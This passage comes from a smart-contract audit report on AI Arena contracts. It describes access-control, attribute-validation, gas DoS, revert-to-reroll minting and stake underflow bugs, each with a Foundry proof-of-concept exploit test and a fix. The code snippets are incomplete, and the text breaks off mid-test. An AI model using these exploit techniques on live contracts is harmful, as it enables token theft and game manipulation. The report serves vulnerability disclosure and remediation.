From Openzeppelin::AccessControl and AccessControl::setupRole

    * ====
    * This function should only be called from the constructor when setting
    * up the initial roles for the system.
    * Using this function in any other way is effectively circumventing the admin
    * system imposed by {AccessControl}.
    * ====
    * NOTE: This function is deprecated in favor of {_grantRole}.
    function _setupRole(bytes32 role, address account) internal virtual {
        _grantRole(role, account);

    * Roles can be granted and revoked dynamically via the {grantRole} and
    * {revokeRole} functions. Each role has an associated admin role, and only
    * accounts that have a role's admin role can call {grantRole} and {revokeRole}.
    * By default, the admin role for all roles is `DEFAULT_ADMIN_ROLE`, which means
    * that only accounts with this role will be able to grant or revoke other
    * roles. More complex role relationships can be created by using
    * {_setRoleAdmin}.
    * WARNING: The `DEFAULT_ADMIN_ROLE` is also its own admin: it has permission to
    * grant and revoke this role. Extra precautions should be taken to secure
    * accounts that have been granted it.

Proof of Concept

  • As you can see the owner cannot revoke becasue there is no admin for that role, owner should be a default admin for all the roles granted.
[PASS] test_POC_Revoke() (gas: 72392)
  [72392] NeuronTest::test_POC_Revoke() 
    ├─ [27181] Neuron::addMinter(NeuronTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) 
    │   ├─ emit RoleGranted(role: 0x9f2df0fed2c77648de5860a4cc508cd0818c85b8b8a1ab4ceeef8d981c8956a6, account: NeuronTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], sender: NeuronTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← ()
    ├─ [0] VM::expectRevert() 
    │   └─ ← ()
    ├─ [34420] Neuron::revokeRole(0x9f2df0fed2c77648de5860a4cc508cd0818c85b8b8a1ab4ceeef8d981c8956a6, NeuronTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) 
    │   └─ ← "AccessControl: account 0x7fa9385be102ac3eac297483dd6233d62b3e1496 is missing role 0x0000000000000000000000000000000000000000000000000000000000000000"
    └─ ← ()
  • Now paste the below POC into test/Neuron.t.sol and run forge t --mt test_POC_Revoke -vvvv.
    function test_POC_Revoke() external {

        _neuronContract.revokeRole(keccak256("MINTER_ROLE"), _ownerAddress);

Tools Used


Modify the constructor on Neuron.sol to grant default admin role to owner.

    constructor(address ownerAddress, address treasuryAddress_, address contributorAddress)
        ERC20("Neuron", "NRN")
        _ownerAddress = ownerAddress;
        treasuryAddress = treasuryAddress_;
        isAdmin[_ownerAddress] = true;
        _mint(treasuryAddress, INITIAL_TREASURY_MINT);
        _mint(contributorAddress, INITIAL_CONTRIBUTOR_MINT);

+       _grantRole(DEFAULT_ADMIN_ROLE, _ownerAddress);

hickuphh3 (judge) commented:

Selecting as best report because it also mentions that _grantRole should be used instead of _setupRole.

I’m excluding admin error in this. Simply about functionality: not being able to revoke roles might be problematic for deprecation / migration purposes.

[M-03] Fighter created by mintFromMergingPool can have arbitrary weight and element

Submitted by ktg, also found by visualbits, d3e4, vnavascues, dutra, niser93, alexxander, denzi_, Silvermist, evmboi32, Tumelo_Crypto, givn, Blank_Space, yotov721, juancito, Matue, stakog, 0xWallSecurity, FloatingPragma, ahmedaghadi, aslanbek, agadzhalov, Topmark, immeas, _eperezok, AlexCzm, klau5, petro_1912, Tendency, BARW, peter, ke1caM, Draiakoo, McToady, 0xCiphky, 0xvj, pkqs90, cats, fnanni, rspadi, krikolkk, handsomegiraffe, Giorgio, 0xlemon, kiqo, SpicyMeatball, 0xRiO, haxatron, MrPotatoMagic, 0xDetermination, and sl1

  • Fighter created by mintFromMergingPool can have arbitrary weight and element like 0 or 2**256 - 1
  • Invalid weight and element could greatly affect AI Arena battles.

Proof of Concept

When someone claim their nft rewards from MergingPool, they can input customeAttributes and create fighters with arbitrary values since currently there is no check on customeAttributes and it could varies from 0 to 2**256 - 1 (type(uint256).max):

function claimRewards(
        string[] calldata modelURIs, 
        string[] calldata modelTypes,
        uint256[2][] calldata customAttributes

function mintFromMergingPool(
        address to, 
        string calldata modelHash, 
        string calldata modelType, 
        uint256[2] calldata customAttributes
        require(msg.sender == _mergingPoolAddress);
            uint256(keccak256(abi.encode(msg.sender, fighters.length))), 

This allow creating fighters with element and weight range from 0 to 2**256 - 1 and can have negative impact on AI Arena matches according to the doc here, for example:

  • Weight is described in the doc as used to calculate how far the fighter moves when being knocked back.. If an nft has extremely large weight like 2**256- 1, then it could never be knocked back
  • Element can only be one of Fire, Electricity or Water, an nft with element outside of this list could be created.

Below is a POC, save the test case to contract MergingPoolTest under file test/MergingPool.t.sol and run it using command: forge test --match-path test/MergingPool.t.sol --match-test testClaimRewardsArbitraryElementAndWeight -vvvv

function testClaimRewardsArbitraryElementAndWeight() public {
        assertEq(_fighterFarmContract.ownerOf(0), _ownerAddress);
        assertEq(_fighterFarmContract.ownerOf(1), _DELEGATED_ADDRESS);
        uint256[] memory _winners = new uint256[](2);
        _winners[0] = 0;
        _winners[1] = 1;
        // winners of roundId 0 are picked
        assertEq(_mergingPoolContract.isSelectionComplete(0), true);
        assertEq(_mergingPoolContract.winnerAddresses(0, 0) == _ownerAddress, true);
        // winner matches ownerOf tokenId
        assertEq(_mergingPoolContract.winnerAddresses(0, 1) == _DELEGATED_ADDRESS, true);
        string[] memory _modelURIs = new string[](2);
        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        string[] memory _modelTypes = new string[](2);
        _modelTypes[0] = "original";
        _modelTypes[1] = "original";
        uint256[2][] memory _customAttributes = new uint256[2][](2);
        _customAttributes[0][0] = uint256(0);
        _customAttributes[0][1] = uint256(type(uint256).max);
        _customAttributes[1][0] = uint256(type(uint256).max);
        _customAttributes[1][1] = uint256(0);
        // winners of roundId 1 are picked
        // winner claims rewards for previous roundIds
        _mergingPoolContract.claimRewards(_modelURIs, _modelTypes, _customAttributes);

        // Fighter 2 has 2**256 weight and element = 0
        (, ,uint256 weight , uint256 element , , , ) = _fighterFarmContract.getAllFighterInfo(2);
        assertEq(weight, 2**256 - 1);
        assertEq(element, 0);

        // Fighter 3 has 0 weight and 2**256 element
        (, , weight ,  element , , , ) = _fighterFarmContract.getAllFighterInfo(3);
        assertEq(weight, 0);
        assertEq(element, 2**256 - 1);


I recommend checking customAttributes in function mintFromMergingPool and only restrict weight and element in predefined ranges. For example, weight must be in range [65, 95], element must be in range [0,2].

brandinho (AI Arena) confirmed via duplicate issue #1670

AI Arena mitigated:

Status: Not fully mitigated. Full details in reports from fnanni and niser93 (1, 2), and also included in the Mitigation Review section below.

[M-04] DoS in MergingPool::claimRewards function and potential DoS in RankedBattle::claimNRN function if called after a significant amount of rounds passed

Submitted by ahmedaghadi, also found by SpicyMeatball (1, 2), btk, 0xKowalski, ktg (1, 2), 0xDetermination (1, 2), Ryonen, sl1 (1, 2), MrPotatoMagic, klau5 (1, 2, 3), vnavascues, pontifex, Nyxaris, alexzoid, inzinko, grearlake (1, 2), Honour, cu5t0mpeo, evmboi32, Avci, Greed, josephdara, VAD37, DeFiHackLabs, 0xPluto, radev_sw (1, 2), MidgarAudits, KmanOfficial, soliditywala, ladboy233, AlexCzm, jesusrod15, erosjohn, merlinboii, taner2344, Krace, ke1caM (1, 2), BigVeezus, Draiakoo, peanuts (1, 2), McToady (1, 2), Giorgio, 0x13, deadrxsezzz, SovaSlava, almurhasan (1, 2), 0xvj, _eperezok (1, 2), emrekocak, fnanni, pipidu83, y4y, jesjupyter, BARW (1, 2), djxploit, sobieski, ReadyPlayer2 (1, 2), Fitro, 0xAleko, zaevlad, GoSlang, 0xRiO, Cryptor, Kalogerone, t0x1c, nuthan2x, yovchev_yoan, and dvrkzy

The MergingPool::claimRewards function loop through last claimed round ID to the latest round ID ( ):

function claimRewards(
    string[] calldata modelURIs,
    string[] calldata modelTypes,
    uint256[2][] calldata customAttributes
    uint256 winnersLength;
    uint32 claimIndex = 0;
@->    uint32 lowerBound = numRoundsClaimed[msg.sender];
@->    for (uint32 currentRound = lowerBound; currentRound < roundId; currentRound++) {
        numRoundsClaimed[msg.sender] += 1;
        winnersLength = winnerAddresses[currentRound].length;
        for (uint32 j = 0; j < winnersLength; j++) {
            if (msg.sender == winnerAddresses[currentRound][j]) {
                claimIndex += 1;
    if (claimIndex > 0) {
        emit Claimed(msg.sender, claimIndex);

Also there’s another nested loop which loops through all the winners each round. Thus, it will become very expensive to claim rewards and eventually leads to block gas limit. Due to which some users may never be able to claim their rewards.

Therefore, If user try to claim their rewards after many rounds has passed then due to the above mentioned loops, it will consume a lot of gas and eventually leads to block gas limit.

Similarly, the RankedBattle::claimNRN function loop through last claimed round ID to the latest round ID ( ) :

function claimNRN() external {
    require(numRoundsClaimed[msg.sender] < roundId, "Already claimed NRNs for this period");
    uint256 claimableNRN = 0;
    uint256 nrnDistribution;
@->    uint32 lowerBound = numRoundsClaimed[msg.sender];
@->    for (uint32 currentRound = lowerBound; currentRound < roundId; currentRound++) {
        nrnDistribution = getNrnDistribution(currentRound);
        claimableNRN += (
            accumulatedPointsPerAddress[msg.sender][currentRound] * nrnDistribution
        ) / totalAccumulatedPoints[currentRound];
        numRoundsClaimed[msg.sender] += 1;
    if (claimableNRN > 0) {
        amountClaimed[msg.sender] += claimableNRN;, claimableNRN);
        emit Claimed(msg.sender, claimableNRN);

Although, it’s relatively difficult to reach the block gas limit in claimNRN function as compared to claimRewards function, but still it’s possible.

Proof of Concept

For claimRewards function, Add the below function in MergingPool.t.sol:

function testClaimRewardsDOS() public {
    address user1 = vm.addr(1);
    address user2 = vm.addr(2);
    address user3 = vm.addr(3);


    uint offset = 35;
    uint totalWin = 9;

    uint256[] memory _winnersGeneral = new uint256[](2);
    _winnersGeneral[0] = 0;
    _winnersGeneral[1] = 1;

    uint256[] memory _winnersUser = new uint256[](2);
    _winnersUser[0] = 0;
    _winnersUser[1] = 2;
    for (uint i = 0; i < offset * totalWin; i++) {
        if (i % offset == 0) {
        } else {

    string[] memory _modelURIs = new string[](totalWin);
    string[] memory _modelTypes = new string[](totalWin);
    uint256[2][] memory _customAttributes = new uint256[2][](totalWin);
    for (uint i = 0; i < totalWin; i++) {
        ] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelTypes[i] = "original";
        _customAttributes[i][0] = uint256(1);
        _customAttributes[i][1] = uint256(80);
    uint gasBefore = gasleft();
    uint gasAfter = gasleft();
    uint gasDiff = gasBefore - gasAfter;
    emit log_uint(gasDiff);
    uint256 numRewards = _mergingPoolContract.getUnclaimedRewards(user3);
    assertEq(numRewards, 0);
    assertGt(gasDiff, 4_000_000);

You can run the test by:

forge test --mt testClaimRewardsDOS -vv

Here I had considered 3 users, user1, user2, and user3. After each offset rounds, I picked user3 as a winner. There were total of 315 ( offset * totalWin ) rounds passed and user3 won in 9 of them. Then I tried to claim rewards for user3 and it consumed more than 4M gas.

Also the more the round in which user3 has won, the more gas it will consume. Even if offset is 1 and totalWin is 9 ( i.e total of 9 rounds out of which user3 won in 9 of them ), it will consume more than 3.4M gas.

Also, we’ve considered only 2 winners per round, as the number of winners increases, the gas consumption will also increase due to the nested loop which loops through all the winners each round.

So if any user claim their rewards after many rounds has passed or if they have won in many rounds, it will consume a lot of gas and eventually leads to block gas limit.

For claimNRN function, Add the below function in RankedBattle.t.sol:

function testClaimNRNDoS() public {
        1 * 10 ** 18,

    address staker = vm.addr(3);
    _neuronContract.transfer(staker, 400_000 * 10 ** 18);
    _rankedBattleContract.stakeNRN(30_000 * 10 ** 18, 0);
    assertEq(_rankedBattleContract.amountStaked(0), 30_000 * 10 ** 18);

    address claimee = vm.addr(4);
    _neuronContract.transfer(claimee, 400_000 * 10 ** 18);
    _rankedBattleContract.stakeNRN(40_000 * 10 ** 18, 1);
    assertEq(_rankedBattleContract.amountStaked(1), 40_000 * 10 ** 18);

    uint offset = 35;
    uint totalWin = 9;
    for (uint i = 0; i < offset * totalWin; i++) {
        // 0 win
        // 1 tie
        // 2 loss
        if (i % offset == 0) {
            uint256 currentVoltage = _voltageManagerContract.ownerVoltage(
            if (currentVoltage < 100) {
      , 1); //paying 1 $NRN for 1 batteries

            _rankedBattleContract.updateBattleRecord(1, 50, 0, 1500, true);
        } else {
            uint256 currentVoltage = _voltageManagerContract.ownerVoltage(
            if (currentVoltage < 100) {
      , 1); //paying 1 $NRN for 1 batteries

            _rankedBattleContract.updateBattleRecord(0, 50, 0, 1500, true);

    uint256 gasBefore = gasleft();
    uint256 gasAfter = gasleft();
    uint256 gasDiff = gasBefore - gasAfter;
    emit log_uint(gasDiff);
    assertGt(gasDiff, 1_000_000);

You can run the test by:

forge test --mt testClaimNRNDoS -vv

In the case of claimNRN function, it consumed more than 1M gas which is relatively less as compared to claimRewards function. But still it has potential to reach block gas limit.

Even for the users for whom these both functions doesn’t reach block gas limit, it can be very expensive and difficult for them to claim their rewards if some rounds has passed.

Tools Used


It can be fixed by adding a parameter for the number of rounds to consider.

For claimRewards function, so the changes would look like:

function claimRewards(
    string[] calldata modelURIs,
    string[] calldata modelTypes,
-    uint256[2][] calldata customAttributes
+    uint256[2][] calldata customAttributes,
+    uint32 totalRoundsToConsider
    uint256 winnersLength;
    uint32 claimIndex = 0;
    uint32 lowerBound = numRoundsClaimed[msg.sender];
+    require(lowerBound + totalRoundsToConsider < roundId, "MergingPool: totalRoundsToConsider exceeds the limit");
-    for (uint32 currentRound = lowerBound; currentRound < roundId; currentRound++) {
+    for (uint32 currentRound = lowerBound; currentRound < lowerBound + totalRoundsToConsider; currentRound++) {
        numRoundsClaimed[msg.sender] += 1;
        winnersLength = winnerAddresses[currentRound].length;
        for (uint32 j = 0; j < winnersLength; j++) {
            if (msg.sender == winnerAddresses[currentRound][j]) {
                claimIndex += 1;
    if (claimIndex > 0) {
        emit Claimed(msg.sender, claimIndex);

For claimNRN function, so the changes would look like:

- function claimNRN() external {
+ function claimNRN(uint32 totalRoundsToConsider) external {
    require(numRoundsClaimed[msg.sender] < roundId, "Already claimed NRNs for this period");
    uint256 claimableNRN = 0;
    uint256 nrnDistribution;
    uint32 lowerBound = numRoundsClaimed[msg.sender];
+    require(lowerBound + totalRoundsToConsider < roundId, "RankedBattle: totalRoundsToConsider exceeds the limit");
-    for (uint32 currentRound = lowerBound; currentRound < roundId; currentRound++) {
+    for (uint32 currentRound = lowerBound; currentRound < lowerBound + totalRoundsToConsider; currentRound++) {
        nrnDistribution = getNrnDistribution(currentRound);
        claimableNRN += (
            accumulatedPointsPerAddress[msg.sender][currentRound] * nrnDistribution
        ) / totalAccumulatedPoints[currentRound];
        numRoundsClaimed[msg.sender] += 1;
    if (claimableNRN > 0) {
        amountClaimed[msg.sender] += claimableNRN;, claimableNRN);
        emit Claimed(msg.sender, claimableNRN);

brandinho (AI Arena) confirmed

AI Arena mitigated:

Status: Mitigation confirmed. Full details in reports from niser93, fnanni, and d3e4.

[M-05] Can mint NFT with the desired attributes by reverting transaction

Submitted by klau5, also found by klau5, visualbits, thank_you, dutra, d3e4 (1, 2), andywer, 0xkaju, PedroZurdo, shaka, honey-k12, Matue, favelanky, 0xDetermination (1, 2), BoRonGod, bgsmallerbear, 0xGreyWolf (1, 2), soliditywala, PUSH0, Tumelo_Crypto, Blank_Space, korok, Greed, givn (1, 2), grearlake, evmboi32, juancito, VAD37, dimulski, DanielArmstrong, gesha17, 0xgrbr, FloatingPragma (1, 2), n0kto, 0xaghas, MidgarAudits, 0xBinChook, Zac, Tricko, alexzoid (1, 2), immeas, AlexCzm, 0xLogos, ni8mare, peter, 0xWallSecurity, WoolCentaur, 0xlyov, forkforkdog, ke1caM, Draiakoo, McToady, web3pwn, peanuts, kaveyjoe, cats, lsaudit, tallo, Tekken, Silvermist, lil_eth, desaperh, Jorgect, niser93, erosjohn (1, 2, 3), fnanni, BARW (1, 2, 3), pa6kuda (1, 2, 3, 4), t0x1c, solmaxis69, yotov721, SpicyMeatball, PoeAudits, Daniel526, iamandreiski (1, 2), tpiliposian, kiqo, aslanbek, haxatron, 0rpse, sl1, Giorgio, vnavascues, Nyxaris, and Pelz

All the attributes of the NFT that should be randomly determined are set in the same transaction which they’re claimed. Therefore, if a user uses a contract wallet, they can intentionally revert the transaction and retry minting if they do not get the desired attribute.

function _createNewFighter(
    address to, 
    uint256 dna, 
    string memory modelHash,
    string memory modelType, 
    uint8 fighterType,
    uint8 iconsType,
    uint256[2] memory customAttributes
    require(balanceOf(to) < MAX_FIGHTERS_ALLOWED);
    uint256 element; 
    uint256 weight;
    uint256 newDna;
    if (customAttributes[0] == 100) {
@>      (element, weight, newDna) = _createFighterBase(dna, fighterType);
    else {
        element = customAttributes[0];
        weight = customAttributes[1];
        newDna = dna;
    uint256 newId = fighters.length;

    bool dendroidBool = fighterType == 1;
@>  FighterOps.FighterPhysicalAttributes memory attrs = _aiArenaHelperInstance.createPhysicalAttributes(
@>  _safeMint(to, newId);
    FighterOps.fighterCreatedEmitter(newId, weight, element, generation[fighterType]);

function _createFighterBase(
    uint256 dna, 
    uint8 fighterType
    returns (uint256, uint256, uint256) 
    uint256 element = dna % numElements[generation[fighterType]];
    uint256 weight = dna % 31 + 65;
    uint256 newDna = fighterType == 0 ? dna : uint256(fighterType);
    return (element, weight, newDna);

Proof of Concept

First, add the PoCCanClaimSpecificAttributeByRevert contract at the bottom of the FighterFarm.t.sol file. This contract represents a user-customizable contract wallet. If the user does not get an NFT with desired attributes, they can revert the transaction and retry minting again.

contract PoCCanClaimSpecificAttributeByRevert {
    FighterFarm fighterFarm;
    address owner;

    constructor(FighterFarm _fighterFarm) {
        fighterFarm = _fighterFarm;
        owner = msg.sender;

    function tryClaim(uint8[2] memory numToMint, bytes memory claimSignature, string[] memory claimModelHashes, string[] memory claimModelTypes) public {
        require(msg.sender == owner, "not owner");
        try fighterFarm.claimFighters(numToMint, claimSignature, claimModelHashes, claimModelTypes) {
            // success to get specific attribute NFT
        } catch {
            // try again next time

    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) public returns (bytes4){
        (,,uint256 weight,,,,) = fighterFarm.getAllFighterInfo(tokenId);
        require(weight == 95, "I don't want this attribute");

        return bytes4(keccak256(bytes("onERC721Received(address,address,uint256,bytes)")));

Then, add this test to the FighterFarm.t.sol file and run it.

function testPoCCanClaimSpecificAttributeByRevert() public {
    uint256 signerPrivateKey = 0xabc123;
    address _POC_DELEGATED_ADDRESS = vm.addr(signerPrivateKey);

    // setup fresh setting to use _POC_DELEGATED_ADDRESS
    _fighterFarmContract = new FighterFarm(_ownerAddress, _POC_DELEGATED_ADDRESS, _treasuryAddress);
    _helperContract = new AiArenaHelper(_probabilities);
    _mintPassContract = new AAMintPass(_ownerAddress, _POC_DELEGATED_ADDRESS);
    _gameItemsContract = new GameItems(_ownerAddress, _treasuryAddress);
    _voltageManagerContract = new VoltageManager(_ownerAddress, address(_gameItemsContract));
    _neuronContract = new Neuron(_ownerAddress, _treasuryAddress, _neuronContributorAddress);
    _rankedBattleContract = new RankedBattle(
        _ownerAddress, address(_fighterFarmContract), _POC_DELEGATED_ADDRESS, address(_voltageManagerContract)
    _mergingPoolContract =
        new MergingPool(_ownerAddress, address(_rankedBattleContract), address(_fighterFarmContract));

    // --- PoC start ---
    address attacker_eoa = address(0x1337);
    PoCCanClaimSpecificAttributeByRevert attacker_contract_wallet = new PoCCanClaimSpecificAttributeByRevert(_fighterFarmContract);

    uint8[2] memory numToMint = [1, 0];
    string[] memory claimModelHashes = new string[](1);
    claimModelHashes[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";

    string[] memory claimModelTypes = new string[](1);
    claimModelTypes[0] = "original";
    // get sign
    bytes32 msgHash = keccak256(abi.encode(
        0, // nftsClaimed[msg.sender][0],
        0 // nftsClaimed[msg.sender][1]

    bytes memory prefix = "\x19Ethereum Signed Message:\n32";
    bytes32 prefixedHash = keccak256(abi.encodePacked(prefix, msgHash));

    (uint8 v, bytes32 r, bytes32 s) = vm.sign(signerPrivateKey, prefixedHash);
    bytes memory claimSignature = abi.encodePacked(r, s, v);

    for(uint160 i = 100; _fighterFarmContract.balanceOf(address(attacker_contract_wallet)) == 0; i++){
        attacker_contract_wallet.tryClaim(numToMint, claimSignature, claimModelHashes, claimModelTypes);

        // other user mints NFT, the fighters.length changes and DNA would be changed
        _mintFromMergingPool(address(i)); // random user claim their NFT
    assertEq(_fighterFarmContract.balanceOf(address(attacker_contract_wallet)), 1);
    uint256 tokenId = _fighterFarmContract.tokenOfOwnerByIndex(address(attacker_contract_wallet), 0);
    (,,uint256 weight,,,,) = _fighterFarmContract.getAllFighterInfo(tokenId);
    assertEq(weight, 95);

Users should only request minting, and attributes values should not be determined in the transaction called by the user. When a user claims an NFT, it should only mint the NFT and end. The attribute should be set by the admin or third-party like chainlink VRF after minting so that the user cannot manipulate it.

It’s not about lack of randomless problem, this is about setting attributes at same transaction when minting NFT. Even if you use chainlink, the same bug can happen if you set the attribute and mint NFTs in the same transaction.

brandinho (AI Arena) confirmed

Note: For full original discussion, see here.

AI Arena mitigated:

Updated dna generation in reRoll and updated dna generation in claimFighters.

Fixed dna generation in mintFromMergingPool.

Status: Not fully mitigated. Full details in reports from fnanni, niser93 (1, 2), and d3e4 (1, 2, 3), and also included in the Mitigation Review section below.

[M-06] NFTs can be transferred even if StakeAtRisk remains, so the user’s win cannot be recorded on the chain due to underflow, and can recover past losses that can’t be recovered (steal protocol’s token)

Submitted by klau5, also found by klau5, peanuts (1, 2), ubermensch (1, 2, 3), denzi_, alexxander, yotov721, 0xMosh, evmboi32, 0xDetermination (1, 2), alexzoid, AlexCzm (1, 2), nuthan2x, ZanyBonzy (1, 2), CodeWasp, DanielArmstrong (1, 2), stakog, 14si2o_Flint, 0xabhay, KmanOfficial, sl1, 0xG0P1, McToady (1, 2), immeas, Aymen0909, merlin, merlinboii, ke1caM, blutorque, 0xCiphky (1, 2), Kalogerone, lanrebayode77, swizz, JCN, handsomegiraffe (1, 2), Kow, WoolCentaur, t0x1c, shaflow2, Jorgect, Giorgio (1, 2), jesjupyter, solmaxis69 (1, 2), 0xAlix2, SpicyMeatball, csanuragjain, haxatron, VAD37, FloatingPragma, dipp, vnavascues, shaka, KupiaSec, tallo, almurhasan, lil_eth, and djxploit

Cannot record a user’s victory on-chain, and it may be possible to recover past losses (which should impossible).

Proof of Concept

If you lose in a game, _addResultPoints is called, and the staked tokens move to the StakeAtRisk.

function _addResultPoints(
    uint8 battleResult, 
    uint256 tokenId, 
    uint256 eloFactor, 
    uint256 mergingPortion,
    address fighterOwner
    uint256 stakeAtRisk;
    uint256 curStakeAtRisk;
    uint256 points = 0;

    /// Check how many NRNs the fighter has at risk
    stakeAtRisk = _stakeAtRiskInstance.getStakeAtRisk(tokenId);

    /// Potential amount of NRNs to put at risk or retrieve from the stake-at-risk contract
@>  curStakeAtRisk = (bpsLostPerLoss * (amountStaked[tokenId] + stakeAtRisk)) / 10**4;
    if (battleResult == 0) {
        /// If the user won the match
    } else if (battleResult == 2) {
        /// If the user lost the match

        /// Do not allow users to lose more NRNs than they have in their staking pool
        if (curStakeAtRisk > amountStaked[tokenId]) {
@>          curStakeAtRisk = amountStaked[tokenId];
        if (accumulatedPointsPerFighter[tokenId][roundId] > 0) {
        } else {
            /// If the fighter does not have any points for this round, NRNs become at risk of being lost
@>          bool success = _neuronInstance.transfer(_stakeAtRiskAddress, curStakeAtRisk);
            if (success) {
@>              _stakeAtRiskInstance.updateAtRiskRecords(curStakeAtRisk, tokenId, fighterOwner);
@>              amountStaked[tokenId] -= curStakeAtRisk;

If a Fighter NFT has NRN tokens staked, that Fighter NFT is locked and cannot be transfered. When the tokens are unstaked and the remaining amountStaked[tokenId] becomes 0, the Fighter NFT is unlocked and it can be transfered. However, it does not check whether there are still tokens in the StakeAtRisk of the Fighter NFT.

function unstakeNRN(uint256 amount, uint256 tokenId) external {
    require(_fighterFarmInstance.ownerOf(tokenId) == msg.sender, "Caller does not own fighter");
    if (amount > amountStaked[tokenId]) {
@>      amount = amountStaked[tokenId];
    amountStaked[tokenId] -= amount;
    globalStakedAmount -= amount;
    stakingFactor[tokenId] = _getStakingFactor(
    _calculatedStakingFactor[tokenId][roundId] = true;
    hasUnstaked[tokenId][roundId] = true;
    bool success = _neuronInstance.transfer(msg.sender, amount);
    if (success) {
        if (amountStaked[tokenId] == 0) {
@>          _fighterFarmInstance.updateFighterStaking(tokenId, false);
        emit Unstaked(msg.sender, amount);

Unstaked Fighter NFTs can now be traded on the secondary market. Suppose another user buys this Fighter NFT with remaining StakeAtRisk.

Normally, if you win a game, you can call reclaimNRN to get the tokens back from StakeAtRisk.

function _addResultPoints(
    uint8 battleResult, 
    uint256 tokenId, 
    uint256 eloFactor, 
    uint256 mergingPortion,
    address fighterOwner
    uint256 stakeAtRisk;
    uint256 curStakeAtRisk;
    uint256 points = 0;

    /// Check how many NRNs the fighter has at risk
@>  stakeAtRisk = _stakeAtRiskInstance.getStakeAtRisk(tokenId);

    /// Potential amount of NRNs to put at risk or retrieve from the stake-at-risk contract
@>  curStakeAtRisk = (bpsLostPerLoss * (amountStaked[tokenId] + stakeAtRisk)) / 10**4;
    if (battleResult == 0) {
        /// If the user won the match

        /// Do not allow users to reclaim more NRNs than they have at risk
        if (curStakeAtRisk > stakeAtRisk) {
@>          curStakeAtRisk = stakeAtRisk;

        /// If the user has stake-at-risk for their fighter, reclaim a portion
        /// Reclaiming stake-at-risk puts the NRN back into their staking pool
@>      if (curStakeAtRisk > 0) {
@>          _stakeAtRiskInstance.reclaimNRN(curStakeAtRisk, tokenId, fighterOwner);
            amountStaked[tokenId] += curStakeAtRisk;
    } else if (battleResult == 2) {

However, if a new user becomes the owner of the Fighter NFT, it does not work as intended.

The _addResultPoints might revert due to the underflow at reclaimNRN’s amountLost[fighterOwner] -= nrnToReclaim. Therefore, the new owner cannot record a victory on-chain with the purchased NFT until the end of this round.

function getStakeAtRisk(uint256 fighterId) external view returns(uint256) {
@>  return stakeAtRisk[roundId][fighterId];

function reclaimNRN(uint256 nrnToReclaim, uint256 fighterId, address fighterOwner) external {
    require(msg.sender == _rankedBattleAddress, "Call must be from RankedBattle contract");
        stakeAtRisk[roundId][fighterId] >= nrnToReclaim, 
        "Fighter does not have enough stake at risk"

    bool success = _neuronInstance.transfer(_rankedBattleAddress, nrnToReclaim);
    if (success) {
        stakeAtRisk[roundId][fighterId] -= nrnToReclaim;
        totalStakeAtRisk[roundId] -= nrnToReclaim;
@>      amountLost[fighterOwner] -= nrnToReclaim;
        emit ReclaimedStake(fighterId, nrnToReclaim);

Even if the new owner already has another NFT and has a sufficient amount of amountLost[fighterOwner], there is a problem.

  • Alice buy the NFT2(tokenId 2) from the secondary market, which has 30 stakeAtRisk.

    • stakeAtRisk of NFT2: 30
    • amountLost: 0
  • Alice also owns the NFT1(tokenId 1) and has 100 stakeAtRisk in the same round.

    • stakeAtRisk of NFT1: 100
    • stakeAtRisk of NFT2: 30
    • amountLost: 100
  • Alice wins with the NFT2 and reclaims 30 stakeAtRisk.

    • stakeAtRisk of NFT1: 100
    • stakeAtRisk of NFT2: 0
    • amountLost: 70
  • If Alice tries to reclaim stakeAtRisk of NFT1, an underflow occurs and it reverts when remaining stakeAtRisk is 30.

    • stakeAtRisk of NFT1: 30
    • stakeAtRisk of NFT2: 0
    • amountLost: 0
  • Alice will no longer be able to record a win for NFT1 due to underflow.

There is a problem even if the user owns a sufficient amount of amountLost[fighterOwner] and does not have stakeAtRisk of another NFT in the current round. In this case, the user can steal the protocol’s token.

  • Alice owns NFT1 and had 100 stakeAtRisk with NFT1 at past round.

    • Since the round has already passed, this loss of 100 NRN is a past loss that can no longer be recovered.
    • Since amountLost[fighterOwner] is a total amount regardless of rounds, it remains 100 even after the round.
    • stakeAtRisk of NFT1: 0 (current round)
    • amountLost: 100 (this should be unrecoverable)
  • Alice buys NFT 2 from the secondary market, which has 100 stakeAtRisk.

    • stakeAtRisk of NFT1: 0
    • stakeAtRisk of NFT2: 100
    • amountLost: 100
  • Alice wins with NFT 2 and reclaims 100.

    • stakeAtRisk of NFT1: 0
    • stakeAtRisk of NFT2: 0
    • amountLost: 0
  • Alice recovers the past loss through NFT 2. Alice recovered past lost, which shouldn’t be recovered, which means she steals the protocol’s token.

This is PoC. You can add it to StakeAtRisk.t.sol and run it.

  • testPoC1 shows that a user with amountLost 0 cannot record a victory with the purchased NFT due to underflow.
  • testPoC2 shows that a user who already has stakeAtRisk due to another NFT in the same round can no longer record a win due to underflow.
  • testPoC3 shows that a user can recover losses from a past round by using a purchased NFT.
function testPoC1() public {
    address seller = vm.addr(3);
    address buyer = vm.addr(4);
    uint256 stakeAmount = 3_000 * 10 ** 18;
    uint256 expectedStakeAtRiskAmount = (stakeAmount * 100) / 100000;
    uint256 tokenId = 0;
    assertEq(_fighterFarmContract.ownerOf(tokenId), seller);
    _rankedBattleContract.stakeNRN(stakeAmount, tokenId);
    assertEq(_rankedBattleContract.amountStaked(tokenId), stakeAmount);
    // loses battle
    _rankedBattleContract.updateBattleRecord(tokenId, 50, 2, 1500, true);
    assertEq(_stakeAtRiskContract.stakeAtRisk(0, tokenId), expectedStakeAtRiskAmount);

    // seller unstake and sell NFT to buyer
    _rankedBattleContract.unstakeNRN(_rankedBattleContract.amountStaked(tokenId), tokenId);
    _fighterFarmContract.transferFrom(seller, buyer, tokenId);

    // The buyer win battle but cannot write at onchain
    vm.expectRevert(abi.encodeWithSignature("Panic(uint256)", 0x11)); // expect arithmeticError (underflow)
